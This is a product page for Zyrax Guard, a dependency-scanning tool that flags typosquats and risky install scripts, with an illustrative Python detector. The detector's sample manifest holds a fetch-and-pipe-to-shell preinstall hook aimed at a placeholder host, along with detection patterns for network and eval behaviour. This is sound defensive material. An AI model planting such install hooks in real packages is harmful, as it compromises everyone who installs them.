Zyrax is building a platform to keep malicious and risky code out of the software you ship. The first piece is already here, and it is free.
Available now · Free & open-source
Zyrax Guard checks your npm, PyPI, and crates dependencies for malicious or risky packages before you install them. No signup, no config, and nothing ever leaves your machine.
Flags names one keystroke away from popular packages, like reqeusts instead of requests.
Cross-checks curated and public advisory feeds for confirmed-bad packages.
Catches AI-suggested packages that do not actually exist on the registry.
Warns on brand-new, low-adoption packages that nobody is depending on yet.
Detects tampered or mismatched lockfile entries in your pull requests.
Surfaces sudden ownership or maintainer handoffs, a classic takeover signal.
Add --deep and Zyrax Guard downloads the package and statically inspects the code that runs at install time, looking for behaviours such as network calls, process spawning, and obfuscated eval, and blocks the dangerous combinations. No sandbox, no Docker, and zero dependencies.
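As an added illustration, not Zyrax Guard's own code (the page does not show its implementation), the Python below sketches two of the checks described above: the one-keystroke typosquat match, using optimal string alignment distance against a small constructed list of popular names, and a --deep style inspection of npm lifecycle scripts for network, process-spawning and obfuscated-eval patterns that blocks when a single hook combines them. The popular-package list, the regexes, the verdict rule, the sample manifests and the example.invalid URL are all constructed assumptions, not Zyrax data.

```python
import json
import re

# Constructed sample of popular names; a real tool would load a curated list per registry.
POPULAR = {"requests", "numpy", "lodash", "express", "serde", "tokio"}


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or swap adjacent chars.
    One keystroke slip (e.g. 'reqeusts' for 'requests') scores 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # adjacent transposition
    return d[-1][-1]


def typosquat_candidates(name: str, popular=POPULAR, max_distance: int = 1) -> set:
    """Popular packages the requested name is within max_distance of (exact matches excluded,
    since those are the genuine package)."""
    name = name.lower()
    return {p for p in popular if 0 < osa_distance(name, p) <= max_distance}


# Install-time behaviours to look for in npm lifecycle scripts (constructed patterns).
RISKY_PATTERNS = {
    "network": re.compile(r"\b(curl|wget|https?://|fetch\(|http\.get|net\.connect)", re.I),
    "process": re.compile(r"child_process|\bspawn\(|\bexec(?:Sync)?\(|subprocess|\|\s*(?:sh|bash)\b", re.I),
    "obfuscated_eval": re.compile(r"\beval\(|new Function\(|Buffer\.from\([^)]*['\"]base64|atob\("),
}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def inspect_install_scripts(package_json_text: str) -> dict:
    """Map each lifecycle hook present in package.json to the set of risk categories it matches."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            findings[hook] = {cat for cat, rx in RISKY_PATTERNS.items() if rx.search(cmd)}
    return findings


def classify(findings: dict) -> str:
    """'block' when one hook both reaches the network and spawns a process or runs obfuscated
    eval; 'warn' for any single risky behaviour; 'ok' otherwise. Rule is an assumption."""
    verdict = "ok"
    for cats in findings.values():
        if "network" in cats and cats & {"process", "obfuscated_eval"}:
            return "block"
        if cats:
            verdict = "warn"
    return verdict


# Constructed manifests. The base64 blob decodes to 'echo hi'; the URL is a reserved placeholder.
RISKY_MANIFEST = json.dumps({
    "name": "reqeusts",
    "version": "0.0.1",
    "scripts": {
        "preinstall": "curl -s https://example.invalid/setup.sh | sh",
        "postinstall": "node -e \"eval(Buffer.from('ZWNobyBoaQ==','base64').toString())\"",
        "test": "node test.js",
    },
})
BENIGN_MANIFEST = json.dumps({
    "name": "my-lib",
    "version": "1.0.0",
    "scripts": {"prepare": "tsc -p .", "test": "jest"},
})


def guard(name: str, package_json_text: str) -> dict:
    """Combine both checks into one report for a package about to be installed."""
    findings = inspect_install_scripts(package_json_text)
    return {
        "typosquat_of": typosquat_candidates(name),
        "install_findings": findings,
        "verdict": classify(findings),
    }


if __name__ == "__main__":
    print(guard("reqeusts", RISKY_MANIFEST))
    print(guard("my-lib", BENIGN_MANIFEST))
```

The typosquat check alone would flag reqeusts; the script scan independently blocks the manifest because its preinstall hook fetches from the network and pipes the result into a shell, which is why the two signals are worth reporting together rather than either one in isolation.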
The free tool protects one machine. The platform will protect everything you ship, across every team and repository.
Every dependency across all your repositories, watched in real time.
Set your security rules once and enforce them across every team and repo.
Full visibility, audit trails, and compliance-ready reports for your security team.
A curated feed that flags malicious packages before they reach public databases.